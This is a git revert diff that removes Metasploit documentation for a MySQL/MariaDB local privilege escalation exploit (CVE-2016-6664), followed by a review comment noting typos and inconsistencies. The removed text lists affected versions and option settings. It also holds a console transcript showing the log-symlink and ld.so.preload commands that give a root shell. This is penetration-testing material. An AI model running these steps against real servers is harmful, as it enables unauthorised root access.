Revert "Land #7605, Mysql privilege escalation, CVE-2016-6664" - premature merge
This reverts commit 92a1c1ece4, reversing changes made to 9b16cdf602.
@@ -1,127 +0,0 @@
## Notes

This exploit was tested on ubuntu 14 and 16. As it relies on log file location and service restarting, success on other linux distributions depends greatly.

## Creating A Testing Environment

There are a few requirements for this module to work:

1. mysql must be started by running mysql_safe
2. the error log must be active
3. mysql logging through syslog must not enabled
4. mysql automatic restart must be enabled

Using Ubuntu 16.04:

1. install mariadb - `apt-get -y install mariadb-server`
2. disable syslog - `sed -i -e "s/syslog/#syslog/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
3. enable error log - `sed -i -e "s/skip_log_error/#skip_log_error/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
4. enable service - `systemctl enable mysql.service`
5. start service - `systemctl start mysql.service`

This module has been tested against the following versions of mysql running on Ubuntu 16.04:

1. MariaDB 10.0.27

On Ubuntu 14.04:

1. MySQL 5.5.35
2. MariaDB 5.5.52

On Debian 8.6

1. MySQL 5.5.53

This module was not tested against, but may work against:

* MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14

* MariaDB
<= 5.5.50

* Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8

* Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0

## Verification Steps

1. Start msfconsole
2. Exploit a box via whatever method
4. Do: `use exploit/linux/local/mysql_priv_esc`
5. Do: `set session #`
6. Do: `set verbose true`
7. Do: `exploit`

## Options

**WritableDir**

A folder we can write files to. Defaults to /tmp

**ErrorLog**

The mysql service error log file. The location of this file is set on the configuration files. Defaults to /var/log/mysql/error.log

**BackdoorShell**

The shell that will be launched using elevated privileges. Defaults to /bin/bash

**COMPILE**

If we should live compile on the system, or drop pre-created binaries. `Auto` will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto`

## Scenarios

### Ubuntu 16.04 (with Linux 4.4.0-21-generic)
### MariaDB 10.0.27 (MariaDB-0ubuntu0.16.04.1)

#### Initial Access

Use whatever means to get a session back to metaploit ith the mysql account, usually dropping a webshell, connecting back to metaploit and escalate to mysql.

#### Escalate to root

msf exploit(mysql_priv_esc) >
[*] Sending stage (36 bytes) to 192.168.205.64
[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000

msf exploit(mysql_priv_esc) > set session 45
session => 45
msf exploit(mysql_priv_esc) > run

[+] mysqld_safe is running
[+] The current user is mysql
[*] Checking if gcc are installed
[*] Checking if gcc are installed
[*] Dropping pre-compiled exploit on system
[*] Writing privesclib to /tmp/fYAMgzW5.so
[*] Max line length is 65537
[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf
[*] Seting up the preload trap
[*] cp /bin/bash /tmp/mysqlrootsh
[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log
[*] kill $(pgrep mysqld)
[*] /bin//sh: 27: kill: Operation not permitted

[*] Waiting for mysqld to restart...
[*] Executing escalation.
[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload
[*] chmod 755 /etc/ld.so.preload
[*] /usr/bin/sudo 2>/dev/null >/dev/null
[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so"
[*] /tmp/mysqlrootsh -p
[*] Cleanup done.
[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target
msf exploit(mysql_priv_esc) > sessions -i 45 -c "id"
[*] Running 'id' on shell session 45 (192.168.205.64)
uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql)
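Review bot: the deleted documentation is internally inconsistent and should be corrected before the module is re-landed: the requirements list states `1. mysql must be started by running mysql_safe` while the scenario output reports `[+] mysqld_safe is running`, and the Verification Steps jump from step 2 to step 4 with no step 3. Smaller fixes for the same re-land: `must not enabled` is missing `be`, `Seting up the preload trap` and `metaploit ith the mysql account` are misspelled, and `[*] Checking if gcc are installed` is printed twice in the transcript. More substantively, the transcript shows `kill $(pgrep mysqld)` failing with `/bin//sh: 27: kill: Operation not permitted` immediately before `Waiting for mysqld to restart...` and a successful escalation, so the Notes section should say what actually triggers the restart the module depends on (requirement 4, automatic restart) when the mysql user cannot signal mysqld, otherwise readers cannot tell whether that failure is expected or indicates a broken run.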